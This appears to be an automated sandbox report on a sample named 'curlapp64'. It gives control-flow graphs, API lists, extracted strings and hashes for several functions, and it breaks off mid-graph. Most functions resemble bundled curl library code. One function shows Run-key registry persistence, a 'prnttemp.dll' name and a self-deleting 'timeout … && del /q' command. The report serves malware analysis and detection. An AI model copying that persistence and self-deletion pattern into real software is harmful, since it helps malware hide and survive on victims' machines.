                                                                                                                                                                                                  Function 00007FF8B7EB6B50 Relevance: 46.0, APIs: 14, Strings: 12, Instructions: 539COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 729 7ff8b7eb6b50-7ff8b7eb6b91 730 7ff8b7eb6b93-7ff8b7eb6b98 729->730 731 7ff8b7eb6b9d-7ff8b7eb6ba8 call 7ff8b7eb6910 729->731 732 7ff8b7eb74bf 730->732 736 7ff8b7eb6bb4-7ff8b7eb6bc6 call 7ff8b7eb8670 731->736 737 7ff8b7eb6baa-7ff8b7eb6baf 731->737 735 7ff8b7eb74c1-7ff8b7eb74e5 call 7ff8b7ec9e10 732->735 736->732 742 7ff8b7eb6bcc-7ff8b7eb6bd6 736->742 737->732 743 7ff8b7eb6bea-7ff8b7eb6bf4 742->743 744 7ff8b7eb6bd8-7ff8b7eb6be8 _strdup 742->744 745 7ff8b7eb6bf6-7ff8b7eb6c06 _strdup 743->745 746 7ff8b7eb6c08-7ff8b7eb6c12 743->746 744->737 744->743 745->737 745->746 747 7ff8b7eb6c33-7ff8b7eb6c42 call 7ff8b7eb74f0 746->747 748 7ff8b7eb6c14-7ff8b7eb6c24 _strdup 746->748 747->732 752 7ff8b7eb6c48-7ff8b7eb6c56 747->752 748->737 750 7ff8b7eb6c26-7ff8b7eb6c2d 748->750 750->747 753 7ff8b7eb6c68-7ff8b7eb6c72 752->753 754 7ff8b7eb6c58-7ff8b7eb6c5f 752->754 756 7ff8b7eb6c74-7ff8b7eb6c7b 753->756 757 7ff8b7eb6cbd-7ff8b7eb6ccc call 7ff8b7eb7960 753->757 754->753 755 7ff8b7eb6c61 754->755 755->753 756->757 758 7ff8b7eb6c7d-7ff8b7eb6cb7 call 7ff8b7e94eb0 call 7ff8b7eba7c0 756->758 757->732 763 7ff8b7eb6cd2-7ff8b7eb6cee 757->763 758->737 758->757 764 7ff8b7eb6cf0-7ff8b7eb6cf7 763->764 765 7ff8b7eb6cf9-7ff8b7eb6d00 763->765 764->765 767 7ff8b7eb6d03-7ff8b7eb6d0a 764->767 765->767 769 7ff8b7eb6d22-7ff8b7eb6d2e 767->769 770 7ff8b7eb6d0c-7ff8b7eb6d1c _strdup 767->770 771 7ff8b7eb6d30-7ff8b7eb6d43 _strdup 769->771 772 7ff8b7eb6d46-7ff8b7eb6d48 769->772 770->737 770->769 771->772 772->732 773 7ff8b7eb6d4e-7ff8b7eb6d64 call 7ff8b7eb7e20 772->773 773->732 776 7ff8b7eb6d6a-7ff8b7eb6d71 773->776 777 7ff8b7eb6d73-7ff8b7eb6d81 call 7ff8b7e8ec10 776->777 778 7ff8b7eb6d87-7ff8b7eb6d8e 776->778 777->735 777->778 780 7ff8b7eb6d90-7ff8b7eb6d9e call 7ff8b7e8ec10 778->780 781 7ff8b7eb6da4-7ff8b7eb6dab 778->781 780->735 780->781 783 7ff8b7eb6de5-7ff8b7eb6dee 781->783 784 7ff8b7eb6dad-7ff8b7eb6dbb call 7ff8b7e8ec10 781->784 788 7ff8b7eb6df0-7ff8b7eb6dfc 783->788 789 7ff8b7eb6e07-7ff8b7eb6e0e 783->789 784->735 796 7ff8b7eb6dc1-7ff8b7eb6dc8 784->796 788->789 791 7ff8b7eb6dfe-7ff8b7eb6e05 788->791 792 7ff8b7eb6e10-7ff8b7eb6e12 789->792 793 7ff8b7eb6e14-7ff8b7eb6e1b 789->793 791->789 792->793 794 7ff8b7eb6e24-7ff8b7eb6e32 792->794 793->794 795 7ff8b7eb6e1d 793->795 797 7ff8b7eb6e34-7ff8b7eb6e41 794->797 798 7ff8b7eb6e4e-7ff8b7eb6e58 794->798 795->794 796->783 799 7ff8b7eb6dca-7ff8b7eb6ddc call 7ff8b7eae230 796->799 797->732 807 7ff8b7eb6e47 797->807 800 7ff8b7eb6e5a-7ff8b7eb6e61 798->800 801 7ff8b7eb6e68-7ff8b7eb6e6f 798->801 799->783 808 7ff8b7eb6dde 799->808 800->801 805 7ff8b7eb6e83-7ff8b7eb6e91 801->805 806 7ff8b7eb6e71-7ff8b7eb6e78 801->806 810 7ff8b7eb6e93-7ff8b7eb6e9a 805->810 811 7ff8b7eb6e9c 805->811 806->805 809 7ff8b7eb6e7a-7ff8b7eb6e81 806->809 807->798 808->783 812 7ff8b7eb6ea0-7ff8b7eb6ebc call 7ff8b7e94d90 809->812 810->812 811->812 815 7ff8b7eb6ec5-7ff8b7eb6ecc 812->815 816 7ff8b7eb6ebe-7ff8b7eb6ec0 812->816 817 7ff8b7eb6ed0-7ff8b7eb6ed7 815->817 816->732 817->817 818 7ff8b7eb6ed9-7ff8b7eb6ef7 call 7ff8b7eae150 817->818 821 7ff8b7eb6f92-7ff8b7eb6fd5 call 7ff8b7ec4ff0 818->821 822 7ff8b7eb6efd-7ff8b7eb6f36 818->822 821->732 828 7ff8b7eb6fdb-7ff8b7eb6fea call 7ff8b7e6ad70 821->828 826 7ff8b7eb6f82-7ff8b7eb6f8d call 7ff8b7eb5fc0 822->826 827 7ff8b7eb6f38-7ff8b7eb6f52 call 7ff8b7e97450 call 7ff8b7e69b70 822->827 826->732 827->732 842 7ff8b7eb6f58-7ff8b7eb6f67 call 7ff8b7eb9050 827->842 835 7ff8b7eb6ff8-7ff8b7eb7001 828->835 836 7ff8b7eb6fec-7ff8b7eb6ff2 828->836 839 7ff8b7eb7007-7ff8b7eb702d 835->839 840 7ff8b7eb7305-7ff8b7eb7316 835->840 836->835 838 7ff8b7eb7303 836->838 838->840 843 7ff8b7eb705e 839->843 844 7ff8b7eb702f-7ff8b7eb7036 839->844 845 7ff8b7eb7328-7ff8b7eb732b 840->845 846 7ff8b7eb7318-7ff8b7eb731f 840->846 861 7ff8b7eb6f69-7ff8b7eb6f78 842->861 862 7ff8b7eb6f7d call 7ff8b7eb4eb0 842->862 853 7ff8b7eb7060-7ff8b7eb706b 843->853 848 7ff8b7eb7041-7ff8b7eb704f call 7ff8b7e98330 844->848 849 7ff8b7eb7038-7ff8b7eb703f 844->849 851 7ff8b7eb7331-7ff8b7eb733f call 7ff8b7e69ee0 845->851 852 7ff8b7eb749d-7ff8b7eb74ba call 7ff8b7e74b60 call 7ff8b7eb5720 845->852 846->845 850 7ff8b7eb7321 846->850 848->843 871 7ff8b7eb7051-7ff8b7eb7058 848->871 849->843 849->848 850->845 872 7ff8b7eb7345-7ff8b7eb7348 851->872 873 7ff8b7eb748e-7ff8b7eb7498 call 7ff8b7e74b60 851->873 852->732 858 7ff8b7eb7081 853->858 859 7ff8b7eb706d-7ff8b7eb707b 853->859 860 7ff8b7eb7083-7ff8b7eb708e 858->860 859->858 866 7ff8b7eb707d-7ff8b7eb707f 859->866 867 7ff8b7eb7090-7ff8b7eb7097 860->867 868 7ff8b7eb70ad 860->868 861->732 862->826 866->860 867->868 874 7ff8b7eb7099-7ff8b7eb70a7 867->874 876 7ff8b7eb70af-7ff8b7eb70ed call 7ff8b7e6a7b0 868->876 871->843 879 7ff8b7eb705a-7ff8b7eb705c 871->879 880 7ff8b7eb734a-7ff8b7eb7376 call 7ff8b7e74b60 872->880 881 7ff8b7eb737c-7ff8b7eb738b call 7ff8b7ec4ee0 872->881 873->852 874->868 883 7ff8b7eb70a9-7ff8b7eb70ab 874->883 876->840 890 7ff8b7eb70f3-7ff8b7eb70fa 876->890 879->853 880->852 880->881 881->732 889 7ff8b7eb7391-7ff8b7eb73ab call 7ff8b7e97450 call 7ff8b7e69b70 881->889 883->876 889->732 901 7ff8b7eb73b1-7ff8b7eb73b8 889->901 892 7ff8b7eb714e-7ff8b7eb715d 890->892 893 7ff8b7eb70fc-7ff8b7eb7147 free * 2 890->893 895 7ff8b7eb7163-7ff8b7eb7200 free * 4 892->895 896 7ff8b7eb7207-7ff8b7eb72b5 free * 3 call 7ff8b7eb5720 892->896 893->892 895->896 902 7ff8b7eb72c0-7ff8b7eb72c7 896->902 903 7ff8b7eb72b7-7ff8b7eb72be 896->903 907 7ff8b7eb73ba-7ff8b7eb73c0 901->907 908 7ff8b7eb73de-7ff8b7eb73e5 901->908 905 7ff8b7eb72d2 902->905 906 7ff8b7eb72c9-7ff8b7eb72d0 902->906 904 7ff8b7eb72d6-7ff8b7eb72fe call 7ff8b7e74b60 903->904 910 7ff8b7eb740c-7ff8b7eb7423 call 7ff8b7eb5fc0 call 7ff8b7eb9050 904->910 905->904 906->904 907->908 912 7ff8b7eb73c2-7ff8b7eb73d7 call 7ff8b7e74b60 907->912 909 7ff8b7eb73e7-7ff8b7eb73ee 908->909 908->910 909->910 913 7ff8b7eb73f0-7ff8b7eb7405 call 7ff8b7e74b60 909->913 910->732 923 7ff8b7eb7429-7ff8b7eb742f 910->923 912->908 913->910 924 7ff8b7eb7431-7ff8b7eb7435 923->924 925 7ff8b7eb7437-7ff8b7eb7440 call 7ff8b7eb8e00 923->925 926 7ff8b7eb744b-7ff8b7eb748c call 7ff8b7e692b0 924->926 928 7ff8b7eb7445-7ff8b7eb7449 925->928 926->732 928->732 928->926
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: %u/%d/%s$Allowing DoH to override max connection limit$NTLM picked AND auth done set, clear picked$NTLM-proxy picked AND auth done set, clear picked$No connections available in cache$No connections available.$No more connections allowed to host$Re-using existing connection with %s %s$anonymous$ftp@example.com$host$proxy
                                                                                                                                                                                                  • API String ID: 0-2902238462
                                                                                                                                                                                                  • Opcode ID: 2b05b9d7d767020b8d379a144df4db33f2fea9fa66fb0a38a5545a4e1ad473dc
                                                                                                                                                                                                  • Instruction ID: 9ec3fe0e874bed25b94003b4b8c1c6e4a3cdb59e8f3166ba4c814a68ef744747
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2b05b9d7d767020b8d379a144df4db33f2fea9fa66fb0a38a5545a4e1ad473dc
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2426922A08BC286EB558F6994903AD3BA4EF45FC8F084036CF9D577A5DF3CE5918360
                                                                                                                                                                                                  Function 00007FF6CF999950 Relevance: 35.4, APIs: 14, Strings: 6, Instructions: 388registryCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 1048 7ff6cf999950-7ff6cf9999ea call 7ff6cf99aa00 call 7ff6cf998d30 RegOpenKeyExW 1053 7ff6cf999a36-7ff6cf999a3f 1048->1053 1054 7ff6cf9999ec-7ff6cf9999fb 1048->1054 1055 7ff6cf999a41-7ff6cf999a58 1053->1055 1056 7ff6cf999a78-7ff6cf999a7f 1053->1056 1057 7ff6cf999a00-7ff6cf999a30 RegSetValueExW RegCloseKey 1054->1057 1058 7ff6cf9999fd 1054->1058 1059 7ff6cf999a73 call 7ff6cf9a3b50 1055->1059 1060 7ff6cf999a5a-7ff6cf999a6d 1055->1060 1061 7ff6cf999a81-7ff6cf999a8c curl_global_init 1056->1061 1062 7ff6cf999a93-7ff6cf999ae3 call 7ff6cf99a440 * 2 call 7ff6cf998d30 1056->1062 1057->1053 1058->1057 1059->1056 1060->1059 1063 7ff6cf999fca-7ff6cf999fcf call 7ff6cf9b1878 1060->1063 1061->1062 1077 7ff6cf999ae5-7ff6cf999af4 1062->1077 1078 7ff6cf999b16-7ff6cf999b38 call 7ff6cf99a830 1062->1078 1070 7ff6cf999fd0-7ff6cf999fd5 call 7ff6cf9b1878 1063->1070 1076 7ff6cf999fd6-7ff6cf999fdb call 7ff6cf9b1878 1070->1076 1088 7ff6cf999fdc-7ff6cf999fe1 call 7ff6cf9b1878 1076->1088 1081 7ff6cf999af6 1077->1081 1082 7ff6cf999af9-7ff6cf999b14 call 7ff6cf9c5ce0 1077->1082 1087 7ff6cf999b3b-7ff6cf999b72 1078->1087 1081->1082 1082->1087 1089 7ff6cf999b74-7ff6cf999b8b 1087->1089 1090 7ff6cf999bab-7ff6cf999be7 1087->1090 1096 7ff6cf999fe2-7ff6cf999fe7 call 7ff6cf9b1878 1088->1096 1092 7ff6cf999ba6 call 7ff6cf9a3b50 1089->1092 1093 7ff6cf999b8d-7ff6cf999ba0 1089->1093 1094 7ff6cf999bf0 1090->1094 1092->1090 1093->1070 1093->1092 1098 7ff6cf999bf4-7ff6cf999c1e call 7ff6cf9742e0 call 7ff6cf977b30 1094->1098 1105 7ff6cf999c20-7ff6cf999c32 1098->1105 1106 7ff6cf999c52-7ff6cf999c55 1098->1106 1107 7ff6cf999c34-7ff6cf999c47 1105->1107 1108 7ff6cf999c4d call 7ff6cf9a3b50 1105->1108 1109 7ff6cf999cb1-7ff6cf999cde call 7ff6cf999400 1106->1109 1110 7ff6cf999c57-7ff6cf999c62 1106->1110 1107->1076 1107->1108 1108->1106 1116 7ff6cf999ce0-7ff6cf999cf6 1109->1116 1117 7ff6cf999d16-7ff6cf999d1d 1109->1117 1110->1098 1113 7ff6cf999c64-7ff6cf999c76 call 7ff6cf973c60 1110->1113 1123 7ff6cf999c78-7ff6cf999c83 1113->1123 1124 7ff6cf999c9d-7ff6cf999cac call 7ff6cf980390 1113->1124 1119 7ff6cf999d11 call 7ff6cf9a3b50 1116->1119 1120 7ff6cf999cf8-7ff6cf999d0b 1116->1120 1121 7ff6cf999d1f-7ff6cf999d25 curl_global_cleanup 1117->1121 1122 7ff6cf999d2c-7ff6cf999d5a RegOpenKeyExW 1117->1122 1119->1117 1120->1119 1126 7ff6cf999fc4-7ff6cf999fc9 call 7ff6cf9b1878 1120->1126 1121->1122 1128 7ff6cf999d80-7ff6cf999e19 call 7ff6cf998d30 call 7ff6cf99ab30 call 7ff6cf999220 1122->1128 1129 7ff6cf999d5c-7ff6cf999d7a RegDeleteValueW RegCloseKey 1122->1129 1123->1124 1130 7ff6cf999c85-7ff6cf999c98 call 7ff6cf980390 1123->1130 1124->1094 1126->1063 1141 7ff6cf999e1e-7ff6cf999e27 1128->1141 1129->1128 1130->1094 1142 7ff6cf999e60-7ff6cf999e68 1141->1142 1143 7ff6cf999e29-7ff6cf999e40 1141->1143 1146 7ff6cf999ea0-7ff6cf999ea8 1142->1146 1147 7ff6cf999e6a-7ff6cf999e80 1142->1147 1144 7ff6cf999e42-7ff6cf999e55 1143->1144 1145 7ff6cf999e5b call 7ff6cf9a3b50 1143->1145 1144->1088 1144->1145 1145->1142 1151 7ff6cf999edb-7ff6cf999ef4 1146->1151 1152 7ff6cf999eaa-7ff6cf999ebb 1146->1152 1149 7ff6cf999e82-7ff6cf999e95 1147->1149 1150 7ff6cf999e9b call 7ff6cf9a3b50 1147->1150 1149->1096 1149->1150 1150->1146 1153 7ff6cf999ef6-7ff6cf999f0c 1151->1153 1154 7ff6cf999f2c-7ff6cf999f61 call 7ff6cf9a3bc8 1151->1154 1156 7ff6cf999ed6 call 7ff6cf9a3b50 1152->1156 1157 7ff6cf999ebd-7ff6cf999ed0 1152->1157 1159 7ff6cf999f0e-7ff6cf999f21 1153->1159 1160 7ff6cf999f27 call 7ff6cf9a3b50 1153->1160 1164 7ff6cf999f63-7ff6cf999f79 1154->1164 1165 7ff6cf999f95-7ff6cf999fc3 call 7ff6cf9a3b30 1154->1165 1156->1151 1157->1126 1157->1156 1159->1126 1159->1160 1160->1154 1166 7ff6cf999f90 call 7ff6cf9a3b50 1164->1166 1167 7ff6cf999f7b-7ff6cf999f8e 1164->1167 1166->1165 1167->1126 1167->1166
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$CloseOpenValue$DeleteHandleModulecurl_global_cleanupcurl_global_init
                                                                                                                                                                                                  • String ID: %$Software\Microsoft\Windows\CurrentVersion\Run$\prnttemp.dll$curlapp64$timeout /t 10 /nobreak && del /q "{}"$ZYo
                                                                                                                                                                                                  • API String ID: 3531770516-908462046
                                                                                                                                                                                                  • Opcode ID: 76b217812f3cf22f8477bc8369b65e3bd391172dd95f449b600b68b6009c0c7b
                                                                                                                                                                                                  • Instruction ID: 10264d4509c07baeae8f560fc3420e178b9903c1643eb1b7be55b831cf6e5ef2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 76b217812f3cf22f8477bc8369b65e3bd391172dd95f449b600b68b6009c0c7b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E029162E18B8189EF00DF69E4443AD6361FB857A5F515232EA9D83AEEDF3CD584C310
                                                                                                                                                                                                  Function 00007FF8B7EAFE30 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 152libraryloadernetworkCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 1171 7ff8b7eafe30-7ff8b7eafe4c 1172 7ff8b7eafe96-7ff8b7eafe9d call 7ff8b7e74840 1171->1172 1173 7ff8b7eafe4e-7ff8b7eafe60 WSAStartup 1171->1173 1181 7ff8b7eafea3-7ff8b7eafec8 GetModuleHandleW 1172->1181 1182 7ff8b7eb00ab-7ff8b7eb00c2 call 7ff8b7ec9e10 1172->1182 1174 7ff8b7eafe62-7ff8b7eafe69 1173->1174 1175 7ff8b7eafe79-7ff8b7eafe95 call 7ff8b7ec9e10 1173->1175 1178 7ff8b7eafe73 WSACleanup 1174->1178 1179 7ff8b7eafe6b-7ff8b7eafe71 1174->1179 1178->1175 1179->1172 1179->1178 1184 7ff8b7eafed6-7ff8b7eaff13 GetProcAddress wcspbrk 1181->1184 1185 7ff8b7eafeca-7ff8b7eafed1 1181->1185 1188 7ff8b7eaff15-7ff8b7eaff1b 1184->1188 1189 7ff8b7eaff3d-7ff8b7eaff40 1184->1189 1187 7ff8b7eb0066-7ff8b7eb00a3 call 7ff8b7ebc700 QueryPerformanceFrequency 1185->1187 1187->1182 1192 7ff8b7eaff2f-7ff8b7eaff38 LoadLibraryW 1188->1192 1193 7ff8b7eaff1d-7ff8b7eaff2a 1188->1193 1194 7ff8b7eaff42-7ff8b7eaff55 GetProcAddress 1189->1194 1195 7ff8b7eaff6c-7ff8b7eaff83 GetSystemDirectoryW 1189->1195 1197 7ff8b7eb002e-7ff8b7eb0048 1192->1197 1193->1197 1194->1195 1198 7ff8b7eaff57-7ff8b7eaff67 LoadLibraryExW 1194->1198 1199 7ff8b7eb0026 1195->1199 1200 7ff8b7eaff89-7ff8b7eaffa0 malloc 1195->1200 1197->1187 1202 7ff8b7eb004a-7ff8b7eb005d GetProcAddress 1197->1202 1198->1197 1199->1197 1203 7ff8b7eaffa2-7ff8b7eaffb0 GetSystemDirectoryW 1200->1203 1204 7ff8b7eb001d-7ff8b7eb0020 free 1200->1204 1202->1187 1205 7ff8b7eb005f 1202->1205 1203->1204 1206 7ff8b7eaffb2-7ff8b7eaffbc 1203->1206 1204->1199 1205->1187 1207 7ff8b7eaffc0-7ff8b7eaffc9 1206->1207 1207->1207 1208 7ff8b7eaffcb 1207->1208 1209 7ff8b7eaffd2-7ff8b7eaffd9 1208->1209 1209->1209 1210 7ff8b7eaffdb-7ff8b7eaffe8 1209->1210 1211 7ff8b7eafff0-7ff8b7eafffe 1210->1211 1211->1211 1212 7ff8b7eb0000-7ff8b7eb0006 1211->1212 1213 7ff8b7eb0014 LoadLibraryW 1212->1213 1214 7ff8b7eb0008-7ff8b7eb0012 1212->1214 1215 7ff8b7eb001a 1213->1215 1214->1215 1215->1204
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressLibraryLoadProc$DirectorySystem$CleanupFrequencyHandleModulePerformanceQueryStartupfreemallocwcspbrk
                                                                                                                                                                                                  • String ID: AddDllDirectory$LoadLibraryExW$if_nametoindex$iphlpapi.dll$kernel32
                                                                                                                                                                                                  • API String ID: 2084031714-2297675747
                                                                                                                                                                                                  • Opcode ID: 25d10e906bd9ae6e16c691fc1285ab9041ef61e00e4e74a3fa809b4385e8702e
                                                                                                                                                                                                  • Instruction ID: 60e7d2039a05ef1f24ae319b9f466761dec5eefdffb994f9eb37ed5bf7efc612
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 25d10e906bd9ae6e16c691fc1285ab9041ef61e00e4e74a3fa809b4385e8702e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 97617D25A08B8785FAA09B29E4443BD63A1FF49FD4F484531CB5E467B5EF3CE44A8710
                                                                                                                                                                                                  Function 00007FF6CF9742E0 Relevance: 33.8, APIs: 15, Strings: 4, Instructions: 516COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 1217 7ff6cf9742e0-7ff6cf974334 curl_easy_init 1218 7ff6cf974336-7ff6cf97435c call 7ff6cf97b6c0 1217->1218 1219 7ff6cf974361-7ff6cf974369 1217->1219 1229 7ff6cf974542-7ff6cf974576 call 7ff6cf9a3b30 1218->1229 1221 7ff6cf97436b 1219->1221 1222 7ff6cf97436e-7ff6cf974373 1219->1222 1221->1222 1223 7ff6cf97437a-7ff6cf974382 1222->1223 1224 7ff6cf974375-7ff6cf974378 1222->1224 1227 7ff6cf974398-7ff6cf97439a 1223->1227 1228 7ff6cf974384-7ff6cf97438f 1223->1228 1226 7ff6cf97439e-7ff6cf974408 call 7ff6cf9a3b58 call 7ff6cf9788d0 1224->1226 1237 7ff6cf974410-7ff6cf97442d call 7ff6cf980a70 1226->1237 1227->1226 1228->1227 1230 7ff6cf974391-7ff6cf974395 1228->1230 1230->1227 1240 7ff6cf97442f-7ff6cf974458 call 7ff6cf975040 call 7ff6cf974b50 1237->1240 1245 7ff6cf974aa7-7ff6cf974acb curl_easy_cleanup call 7ff6cf977c00 1240->1245 1246 7ff6cf97445e-7ff6cf974499 call 7ff6cf973c60 1240->1246 1245->1229 1253 7ff6cf974ad1-7ff6cf974ae2 1245->1253 1251 7ff6cf97449b-7ff6cf9744a6 1246->1251 1252 7ff6cf9744b3 1246->1252 1251->1252 1254 7ff6cf9744a8-7ff6cf9744b1 1251->1254 1255 7ff6cf9744b8-7ff6cf9744da call 7ff6cf980390 curl_easy_cleanup curl_easy_init 1252->1255 1256 7ff6cf97453d call 7ff6cf9a3b50 1253->1256 1257 7ff6cf974ae8-7ff6cf974afb 1253->1257 1254->1255 1265 7ff6cf974577-7ff6cf9745dc call 7ff6cf9a3b58 call 7ff6cf9788d0 1255->1265 1266 7ff6cf9744e0-7ff6cf97450f call 7ff6cf97b6c0 1255->1266 1256->1229 1260 7ff6cf974afd 1257->1260 1261 7ff6cf974b0e-7ff6cf974b13 call 7ff6cf9b1878 1257->1261 1260->1256 1268 7ff6cf974b14-7ff6cf974b19 call 7ff6cf9b1878 1261->1268 1279 7ff6cf9745e1-7ff6cf9745ff call 7ff6cf980a70 1265->1279 1266->1229 1275 7ff6cf974511-7ff6cf974522 1266->1275 1277 7ff6cf974b1a-7ff6cf974b1f call 7ff6cf9b1878 1268->1277 1275->1256 1278 7ff6cf974524-7ff6cf974537 1275->1278 1284 7ff6cf974b20-7ff6cf974b25 call 7ff6cf9b1878 1277->1284 1278->1256 1278->1261 1285 7ff6cf974601-7ff6cf97461b call 7ff6cf975040 1279->1285 1289 7ff6cf974b26-7ff6cf974b2b call 7ff6cf9b1878 1284->1289 1290 7ff6cf974620-7ff6cf97463e call 7ff6cf977b30 1285->1290 1297 7ff6cf974b2c-7ff6cf974b31 call 7ff6cf9b1878 1289->1297 1295 7ff6cf974674-7ff6cf974699 call 7ff6cf974b50 1290->1295 1296 7ff6cf974640-7ff6cf974654 1290->1296 1295->1245 1306 7ff6cf97469f-7ff6cf9746a2 1295->1306 1298 7ff6cf974656-7ff6cf974669 1296->1298 1299 7ff6cf97466f call 7ff6cf9a3b50 1296->1299 1305 7ff6cf974b32-7ff6cf974b37 call 7ff6cf9b1878 1297->1305 1298->1268 1298->1299 1299->1295 1306->1245 1308 7ff6cf9746a8-7ff6cf9746c9 call 7ff6cf973c60 1306->1308 1312 7ff6cf9746cb-7ff6cf9746da 1308->1312 1313 7ff6cf9746f0-7ff6cf9746fa 1308->1313 1312->1313 1315 7ff6cf9746dc-7ff6cf9746ee 1312->1315 1314 7ff6cf9746ff-7ff6cf974727 call 7ff6cf980390 call 7ff6cf975e30 1313->1314 1320 7ff6cf97472d-7ff6cf974758 call 7ff6cf976180 1314->1320 1321 7ff6cf974a67-7ff6cf974a6f 1314->1321 1315->1314 1330 7ff6cf974a25-7ff6cf974a30 1320->1330 1331 7ff6cf97475e-7ff6cf974783 call 7ff6cf975b40 1320->1331 1322 7ff6cf974a71-7ff6cf974a82 1321->1322 1323 7ff6cf974a9e-7ff6cf974aa3 1321->1323 1325 7ff6cf974a99 call 7ff6cf9a3b50 1322->1325 1326 7ff6cf974a84-7ff6cf974a97 1322->1326 1323->1245 1325->1323 1326->1325 1328 7ff6cf974b02-7ff6cf974b07 call 7ff6cf9b1878 1326->1328 1340 7ff6cf974b08-7ff6cf974b0d call 7ff6cf9b1878 1328->1340 1330->1321 1333 7ff6cf974a32-7ff6cf974a46 1330->1333 1341 7ff6cf974789-7ff6cf9747a1 curl_easy_cleanup curl_easy_init 1331->1341 1342 7ff6cf9749e1-7ff6cf9749e9 1331->1342 1337 7ff6cf974a48-7ff6cf974a5b 1333->1337 1338 7ff6cf974a61-7ff6cf974a66 call 7ff6cf9a3b50 1333->1338 1337->1305 1337->1338 1338->1321 1340->1261 1347 7ff6cf9748d8-7ff6cf97493b call 7ff6cf9a3b58 call 7ff6cf9788d0 1341->1347 1348 7ff6cf9747a7-7ff6cf9747d3 call 7ff6cf97b6c0 1341->1348 1345 7ff6cf974a1c-7ff6cf974a21 1342->1345 1346 7ff6cf9749eb-7ff6cf9749fc 1342->1346 1345->1330 1351 7ff6cf974a17 call 7ff6cf9a3b50 1346->1351 1352 7ff6cf9749fe-7ff6cf974a11 1346->1352 1368 7ff6cf974940-7ff6cf97495d call 7ff6cf980a70 1347->1368 1358 7ff6cf974806-7ff6cf97481a 1348->1358 1359 7ff6cf9747d5-7ff6cf9747e6 1348->1359 1351->1345 1352->1297 1352->1351 1362 